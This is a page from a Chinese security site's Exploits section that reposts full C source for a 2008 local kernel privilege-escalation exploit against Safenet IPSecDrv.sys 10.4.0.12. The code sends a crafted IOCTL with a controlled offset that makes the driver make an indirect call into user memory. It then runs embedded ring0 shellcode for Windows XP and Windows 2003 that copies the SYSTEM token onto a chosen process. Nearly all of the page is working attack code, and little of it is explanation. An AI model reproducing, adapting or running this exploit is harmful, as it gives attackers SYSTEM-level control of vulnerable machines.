首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛

当前位置：主页>安全文章>文章资料>Exploits>文章内容 Safenet IPSecDrv.sys <= 10.4.0.12 Local kernel ring0 SYSTEM Exploit 来源：mu-b@digit-labs.org 作者：mu-b 发布时间：2008-01-30   /* safenet-ipsec-call.c * * Copyright (c) 2008 by <mu-b@digit-labs.org> * * Safenet IPSecDrv.sys <= 10.4.0.12 local kernel ring0 indirect call SYSTEM exploit * by mu-b - Thu 03 Jan 2008 * * - Tested on: IPSecDrv.sys 10.4.0.12 *    bundle with: SafeNET HighAssurance Remote, SoftRemote *              - Microsoft Windows 2003 SP2 * * user definable offset used in an indirect call. * * .text:10009970 000 mov     eax, [esp+arg_0] * .text:10009974 000 mov     ecx, [esp+arg_4] * .text:10009978 000 shl     eax, 4 * .text:1000997B 000 push    ecx * .text:1000997C 004 call    off_1001C604[eax] * * Note: this can be made universal for all array offsets, * relatively easily since we control the offset and therefore * the memory address.. * IPSecDrv.sys 10.4.0.12 - 0x1C604 *              10.3.5.6  - 0x1B604 * * Compile: MinGW + -lntdll * *    - Private Source Code -DO NOT DISTRIBUTE - * http://www.digit-labs.org/ -- Digit-Labs 2008!@$! */ #include <stdio.h> #include <stdlib.h> #include <windows.h> #include <ddk/ntapi.h> #define IPSECDRV_IOCTL  0x80002064 #define ARG_SIZE(a)     ((a)/sizeof (void *)) static unsigned char win32_fixup[] =   "\x53"   "\x52"; static unsigned char win2k3_ring0_shell[] =   /* _ring0 */   "\xb8\x24\xf1\xdf\xff"   "\x8b\x00"   "\x8b\xb0\x18\x02\x00\x00"   "\x89\xf0"   /* _sys_eprocess_loop   */   "\x8b\x98\x94\x00\x00\x00"   "\x81\xfb\x04\x00\x00\x00"   "\x74\x11"   "\x8b\x80\x9c\x00\x00\x00"   "\x2d\x98\x00\x00\x00"   "\x39\xf0"   "\x75\xe3"   "\xeb\x21"   /* _sys_eprocess_found  */   "\x89\xc1"   "\x89\xf0"   /* _cmd_eprocess_loop   */   "\x8b\x98\x94\x00\x00\x00"   "\x81\xfb\x00\x00\x00\x00"   "\x74\x10"   "\x8b\x80\x9c\x00\x00\x00"   "\x2d\x98\x00\x00\x00"   "\x39\xf0"   "\x75\xe3"   /* _not_found           */   "\xcc"   /* _cmd_eprocess_found    * _ring0_end           */   /* copy tokens!$%!      */   "\x8b\x89\xd8\x00\x00\x00"   "\x89\x88\xd8\x00\x00\x00"   "\x90"; static unsigned char winxp_ring0_shell[] =   /* _ring0 */   "\xb8\x24\xf1\xdf\xff"   "\x8b\x00"   "\x8b\x70\x44"   "\x89\xf0"   /* _sys_eprocess_loop   */   "\x8b\x98\x84\x00\x00\x00"   "\x81\xfb\x04\x00\x00\x00"   "\x74\x11"   "\x8b\x80\x8c\x00\x00\x00"   "\x2d\x88\x00\x00\x00"   "\x39\xf0"   "\x75\xe3"   "\xeb\x21"   /* _sys_eprocess_found  */   "\x89\xc1"   "\x89\xf0"   /* _cmd_eprocess_loop   */   "\x8b\x98\x84\x00\x00\x00"   "\x81\xfb\x00\x00\x00\x00"   "\x74\x10"   "\x8b\x80\x8c\x00\x00\x00"   "\x2d\x88\x00\x00\x00"   "\x39\xf0"   "\x75\xe3"   /* _not_found           */   "\xcc"   /* _cmd_eprocess_found    * _ring0_end           */   /* copy tokens!$%!      */   "\x8b\x89\xc8\x00\x00\x00"   "\x89\x88\xc8\x00\x00\x00"   "\x90"; static unsigned char win32_ret[] =   "\x5a"   "\x5b"   "\xc2\x04\x00"; struct ioctl_req {   void *arg[ARG_SIZE(0x4C)]; }; static PCHAR fixup_ring0_shell (PVOID base, DWORD ppid, DWORD *zlen) {   DWORD dwVersion, dwMajorVersion, dwMinorVersion;   dwVersion = GetVersion ();   dwMajorVersion = (DWORD) (LOBYTE(LOWORD(dwVersion)));   dwMinorVersion = (DWORD) (HIBYTE(LOWORD(dwVersion)));   if (dwMajorVersion != 5)     {       fprintf (stderr, "* GetVersion, unsupported version\n");       exit (EXIT_FAILURE);     }   switch (dwMinorVersion)     {       case 1:         *zlen = sizeof winxp_ring0_shell - 1;         *(PDWORD) &winxp_ring0_shell[55] = ppid;         return (winxp_ring0_shell);       case 2:         *zlen = sizeof win2k3_ring0_shell - 1;         *(PDWORD) &win2k3_ring0_shell[58] = ppid;         return (win2k3_ring0_shell);       default:         fprintf (stderr, "* GetVersion, unsupported version\n");         exit (EXIT_FAILURE);     }   return (NULL); } static PVOID get_module_base (void) {   PSYSTEM_MODULE_INFORMATION_ENTRY pModuleBase;   PSYSTEM_MODULE_INFORMATION pModuleInfo;   DWORD i, num_modules, status, rlen;   PVOID result;   status = NtQuerySystemInformation (SystemModuleInformation, NULL, 0, &rlen);   if (status != STATUS_INFO_LENGTH_MISMATCH)     {       fprintf (stderr, "* NtQuerySystemInformation failed, 0x%08X\n", status);       exit (EXIT_FAILURE);     }   pModuleInfo = (PSYSTEM_MODULE_INFORMATION) HeapAlloc (GetProcessHeap (), HEAP_ZERO_MEMORY, rlen);   status = NtQuerySystemInformation (SystemModuleInformation, pModuleInfo, rlen, &rlen);   if (status != STATUS_SUCCESS)     {       fprintf (stderr, "* NtQuerySystemInformation failed, 0x%08X\n", status);       exit (EXIT_FAILURE);     }   num_modules = pModuleInfo->Count;   pModuleBase = &pModuleInfo->Module[0];   result = NULL;   for (i = 0; i < num_modules; i++, pModuleBase++)     if (strstr (pModuleBase->ImageName, "IPSECDRV.sys"))       {         result = pModuleBase->Base;         break;       }   HeapFree (GetProcessHeap (), HEAP_NO_SERIALIZE, pModuleInfo);   return (result); } int main (int argc, char **argv) {   struct ioctl_req req;   LPVOID c_addr, p_addr;   LPVOID zpage, zbuf, base, pbase;   DWORD rlen, zlen, ppid;   HANDLE hFile;   BOOL result;   printf ("Safenet IPSecDrv.sys <= 10.4.0.12 local kernel ring0 SYSTEM exploit\n"           "by: <mu-b@digit-labs.org>\n"           "http://www.digit-labs.org/ -- Digit-Labs 2008!@$!\n\n");   if (argc <= 1)     {       fprintf (stderr, "Usage: %s <processid to elevate>\n", argv[0]);       exit (EXIT_SUCCESS);     }   ppid = atoi (argv[1]);   hFile = CreateFileA ("\\\\.\\IPSecDrv", FILE_EXECUTE,                        FILE_SHARE_READ|FILE_SHARE_WRITE, NULL,                        OPEN_EXISTING, 0, NULL);   if (hFile == INVALID_HANDLE_VALUE)     {       fprintf (stderr, "* CreateFileA failed, %d\n", hFile);       exit (EXIT_FAILURE);     }   zpage = VirtualAlloc (NULL, 0x10000, MEM_RESERVE|MEM_COMMIT, PAGE_EXECUTE_READWRITE);   if (zpage == NULL)     {       fprintf (stderr, "* VirtualAlloc failed\n");       exit (EXIT_FAILURE);     }   printf ("* allocated page: 0x%08X [%d-bytes]\n",           zpage, 0x10000);   c_addr = zpage;   base = get_module_base ();   p_addr = (LPVOID) ((DWORD) ((LPVOID) &c_addr - (base + 0x1C604)) / 16);   printf ("* base: 0x%08X, p: 0x%08X\n", base + 0x1C604, &c_addr);   printf ("* call distance: 0x%08X\n", p_addr);   memset (zpage, 0xCC, 0x10000);   zbuf = fixup_ring0_shell (base, ppid, &zlen);   memcpy (zpage, win32_fixup, sizeof (win32_fixup) - 1);   memcpy (zpage + sizeof (win32_fixup) - 1, zbuf, zlen);   memcpy (zpage + sizeof (win32_fixup) + zlen - 1,           win32_ret, sizeof (win32_ret) - 1);   memset (&req, 0, sizeof req);   req.arg[0] = p_addr;   /* jump to our address   :)   */   printf ("* jumping.. ");   result = DeviceIoControl (hFile, IPSECDRV_IOCTL,                             &req, sizeof req, &req, sizeof req, &rlen, 0);   if (!result)     {       fprintf (stderr, "* DeviceIoControl failed\n");       exit (EXIT_FAILURE);     }   printf ("done\n\n"           "* hmmm, you didn't STOP the box?!?!\n");   CloseHandle (hFile);   return (EXIT_SUCCESS); }   [推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]   匿名评论 评论内容：(不能超过250字，需审核后才会公布，请自觉遵守互联网相关政策法规。  §最新评论：

热点文章 ·CVE-2012-0217 Intel sysret exp ·Linux Kernel 2.6.32 Local Root ·Array Networks vxAG / xAPV Pri ·Novell NetIQ Privileged User M ·Array Networks vAPV / vxAG Cod ·Excel SLYK Format Parsing Buff ·PhpInclude.Worm - PHP Scripts ·Apache 2.2.0 - 2.2.11 Remote e ·VideoScript 3.0 <= 4.0.1.50 Of ·Yahoo! Messenger Webcam 8.1 Ac ·Family Connections <= 1.8.2 Re ·Joomla Component EasyBook 1.1   相关文章 ·Oracle 10g R1 xdb.xdb_pitrig_p ·Chilkat Mail ActiveX 7.8 (Chil ·Oracle 10g R1 xdb.xdb_pitrig_p ·Connectix Boards <= 0.8.2 temp ·Oracle 10g R1 pitrig_truncate ·Wordpress Plugin Adserve 0.2 a ·Oracle 10g R1 pitrig_drop PLSQ ·Wordpress Plugin WassUp 1.4.3 ·ibProArcade <= 3.3.0 Remote SQ ·Persits XUpload 3.0 AddFile() ·MySpace Uploader (MySpaceUploa ·Sejoong Namo ActiveSquare 6 Na   推荐广告

CopyRight © 2002-2022 VFocuS.Net All Rights Reserved